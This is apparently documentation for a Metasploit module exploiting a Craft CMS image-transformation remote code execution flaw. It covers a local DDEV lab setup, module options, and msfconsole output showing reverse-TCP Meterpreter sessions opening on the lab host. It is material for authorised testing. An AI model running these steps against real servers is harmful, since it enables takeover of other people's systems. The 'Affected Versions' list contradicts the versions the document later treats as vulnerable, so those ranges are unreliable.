## Vulnerable Application

This Metasploit module exploits a Remote Code Execution vulnerability in Craft CMS.

The vulnerability lies in improper handling of image transformations, which can be exploited to
inject and execute arbitrary PHP code on the server via crafted HTTP requests.

---

### Affected Versions

- **3.x series**: `>= 3.9.15`
- **4.x series**: `>= 4.14.15`
- **5.x series**: `>= 5.6.17`

---

### Setting Up a Vulnerable Lab

To test this exploit, follow these steps to set up a vulnerable Craft CMS environment.

#### Docker Setup

Install a specific vulnerable version of Craft CMS:

```bash
mkdir exploit-craft && \
cd exploit-craft && \
    # Configure DDEV (https://ddev.com/) project for Craft CMS \
ddev config \
  --project-type=craftcms \
  --docroot=web \
  --create-docroot \
  --php-version="8.2" \
  --database="postgres:15" \
  --nodejs-version="20" && \
    # Create the DDEV project
ddev start -y && \
    # Create Craft CMS with the specified version
ddev composer create -y --no-scripts --no-interaction "craftcms/craft:5.0.0" && \
    # Install a vulnerable Craft CMS version
ddev composer require "craftcms/cms:5.5.0" \
  --no-scripts \
  --no-interaction --with-all-dependencies && \
    # Set the security key for Craft CMS
ddev craft setup/security-key && \
    # Install Craft CMS
ddev craft install/craft \
    --username=admin \
    --password=password123 \
    --email=admin@example.com \
    --site-name=Testsite \
    --language=en \
    --site-url='$DDEV_PRIMARY_URL' && \
ddev restart && \
    # Launch the project
echo 'Setup complete. Launching the project.' && \
ddev launch
```

---

## Verification Steps

1. Start the vulnerable Craft CMS instance using the steps above.
2. Launch `msfconsole`.
3. Use the module: `use exploit/linux/http/craftcms_preauth_rce_cve_2025_32432`.
4. Set `RHOSTS` to the target Craft CMS instance.
5. Configure additional options (`TARGETURI`, `SSL`, etc.) as needed.
6. Execute the exploit with the `run` command.
7. If successful, the module will execute the payload on the target.


## Options

The module has the following option:

- **ASSET_ID**: This option is required for older versions of Craft CMS, particularly in the 3.x series.
    It specifies the asset ID for the Craft CMS instance. For 3.x versions, this ID must be set correctly to exploit the vulnerability.

For example, if you are targeting a Craft CMS version from the `>= 3.0.0`, `< 3.9.14`, make sure to specify the correct `ASSET_ID`.
This is necessary for successful exploitation when dealing with these versions.

Craft CMS uses the notion of an "Asset" to manage files and media such as images and documents; each asset has a unique ID.
This module does not perform bruteforcing of asset IDs to avoid noisy and inefficient exploitation attempts.


## Scenarios

#### Successful Exploitation Against Craft CMS 5.5.0

**Setup**:

- Local Craft CMS instance with a vulnerable version (e.g., `5.5.0`).
- Metasploit Framework.

**Steps**:

To successfully exploit the Craft CMS vulnerability using this Metasploit module, follow these steps:

1. Start `msfconsole`:
```bash
msfconsole
```

2. Load the module:
```bash
use exploit/linux/http/craftcms_preauth_rce_cve_2025_32432
```

3. Set the `RHOSTS` option to the target Craft CMS instance, for example:
```bash
set RHOSTS exploit-craft.ddev.site
```

4. Configure other necessary options such as `TARGETURI`, `SSL`, and `RPORT` if required. By default:
   - `RPORT` is set to `80`.
   - `TARGETURI` is set to `/`.

5. Set the payload for exploitation. For example:
```bash
set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
```

6. Set the local listener address and port:
```bash
set LHOST 192.168.1.36
set LPORT 4444
```

7. Run the exploit:
```bash
exploit
```

**Expected Results**:

If the target is vulnerable, the module will successfully execute the payload and open a session, such as a Meterpreter shell:

##### For `ARCH_PHP`:

```bash
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > options

Module options (exploit/linux/http/craftcms_preauth_rce_cve_2025_32432):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ASSET_ID  410              yes       Existing asset ID
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-m
                                        etasploit.html
   RPORT     80               yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                      no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.36     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHP In-Memory



View the full module info with the info, or info -d command.
```

```bash
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > exploit http://exploit-craft.ddev.site/
[*] Started reverse TCP handler on 192.168.1.36:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Leaked session.save_path: /var/lib/php/sessions
[+] The target is vulnerable. Session path leaked
[*] Injecting stub & triggering payload...
[*] Sending stage (40004 bytes) to 172.24.0.2
[*] Meterpreter session 12 opened (192.168.1.36:4444 -> 172.24.0.2:35238) at 2025-04-29 21:52:44 +0200

meterpreter > sysinfo
Computer    : exploit-craft-web
OS          : Linux exploit-craft-web 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64
Meterpreter : php/linux
```

##### For `ARCH_CMD`:

```bash
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > set target 1
target => 1
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > exploit http://exploit-craft.ddev.site/
[*] Started reverse TCP handler on 192.168.1.36:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Leaked session.save_path: /var/lib/php/sessions
[+] The target is vulnerable. Session path leaked
[*] Injecting stub & triggering payload...
[*] Sending stage (3045380 bytes) to 172.24.0.2
[*] Meterpreter session 13 opened (192.168.1.36:4444 -> 172.24.0.2:33436) at 2025-04-29 21:53:43 +0200

meterpreter > sysinfo
Computer     : 172.24.0.2
OS           : Debian 12.10 (Linux 6.14.2-2-cachyos)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```
